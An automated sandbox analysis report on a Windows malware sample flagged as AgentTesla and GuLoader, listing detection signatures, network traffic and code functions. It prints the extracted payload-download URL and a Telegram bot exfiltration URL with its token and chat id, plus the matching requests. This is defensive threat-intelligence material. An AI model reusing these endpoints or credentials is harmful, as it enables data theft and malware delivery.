Windows Analysis Report
SecuriteInfo.com.generic.ml.22865.exe

Overview

General Information

Sample Name: SecuriteInfo.com.generic.ml.22865.exe
Analysis ID: 634596
MD5: deb3e51a2d7d566c86b22046c1058f1a
SHA1: a780f7bbf2255a7dcd963c80fad20ee164ca6b93
SHA256: 4b4bb7b5e2fbe3814fca75d1ab132a97c67255ebfe6dc4f3312d64483a181286
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://www.fides-kenya.com/yem/wam.bin"}
Source: SecuriteInfo.com.generic.ml.22865.exe.6932.1.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1570476458", "Chat URL": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument"}
Source: CasPol.exe.2696.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendMessage"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.generic.ml.22865.exe Virustotal: Detection: 8% Perma Link
Source: SecuriteInfo.com.generic.ml.22865.exe ReversingLabs: Detection: 19%
Uses 32bit PE files
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\spndingsfejlen Jump to behavior
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: MpCommu.pdb source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
Source: Binary string: MpCommu.pdbUGP source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://www.fides-kenya.com/yem/wam.bin
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3f25989d6468Host: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yem/wam.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.fides-kenya.comCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000004.00000002.14467253332.000000001D621000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.9740041211.000000001C441000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14468117275.000000001D6D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://V58nqJBvA8Uitwi1EyuW.com
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: network-server.png.1.dr String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: CasPol.exe, 00000004.00000002.14475025923.000000001FD16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000004.00000002.14475025923.000000001FD16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hqQZjN.com
Source: SecuriteInfo.com.generic.ml.22865.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, SourceCodePro-Black.otf.1.dr String found in binary or memory: http://scripts.sil.org/OFLSource
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://www.avast.com0/
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000004.00000002.14444614539.000000000112B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fides-kenya.com/yem/wam.bin
Source: CasPol.exe, 00000004.00000002.14467843631.000000001D698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000004.00000002.14444961038.0000000001165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: CasPol.exe, 00000004.00000002.14467843631.000000001D698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumentdocument-----
Source: CasPol.exe, 00000004.00000002.14472003206.000000001DA5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000004.00000002.14472003206.000000001DA5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: www.fides-kenya.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3CA09A recv, 4_2_1D3CA09A
Source: global traffic HTTP traffic detected: GET /yem/wam.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.fides-kenya.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000004.00000002.14467253332.000000001D621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000004.00000002.14472495479.000000001DAD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"Ch
Source: unknown HTTP traffic detected: POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3f25989d6468Host: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_716A1BFF 1_2_716A1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BF503 1_2_032BF503
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C0976 1_2_032C0976
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C173F 1_2_032C173F
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B735D 1_2_032B735D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B43E8 1_2_032B43E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B43EC 1_2_032B43EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B73F8 1_2_032B73F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9FF0 1_2_032B9FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B723D 1_2_032B723D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B4608 1_2_032B4608
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA606 1_2_032BA606
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B721A 1_2_032B721A
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA263 1_2_032BA263
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9A77 1_2_032B9A77
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9A45 1_2_032B9A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C2E99 1_2_032C2E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9ACC 1_2_032B9ACC
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B72C4 1_2_032B72C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B4570 1_2_032B4570
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA144 1_2_032BA144
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA5A5 1_2_032BA5A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA030 1_2_032BA030
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9C37 1_2_032B9C37
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA05B 1_2_032BA05B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B608F 1_2_032B608F
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B608D 1_2_032B608D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B60EA 1_2_032B60EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B44FB 1_2_032B44FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9CCB 1_2_032B9CCB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D4A83D0 4_2_1D4A83D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D4AB6A8 4_2_1D4AB6A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D4A9AAC 4_2_1D4A9AAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1FF11B80 4_2_1FF11B80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_2035AB28 4_2_2035AB28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_20350070 4_2_20350070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_2035E140 4_2_2035E140
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_2035D8A8 4_2_2035D8A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_20355AE8 4_2_20355AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_2035A608 4_2_2035A608
PE file contains strange resources
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll Jump to behavior
PE file contains more sections than normal
Source: libfreetype-6.dll.1.dr Static PE information: Number of sections : 12 > 10
Source: libpcre-1.dll.1.dr Static PE information: Number of sections : 11 > 10
Uses 32bit PE files
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Contains functionality to call native functions
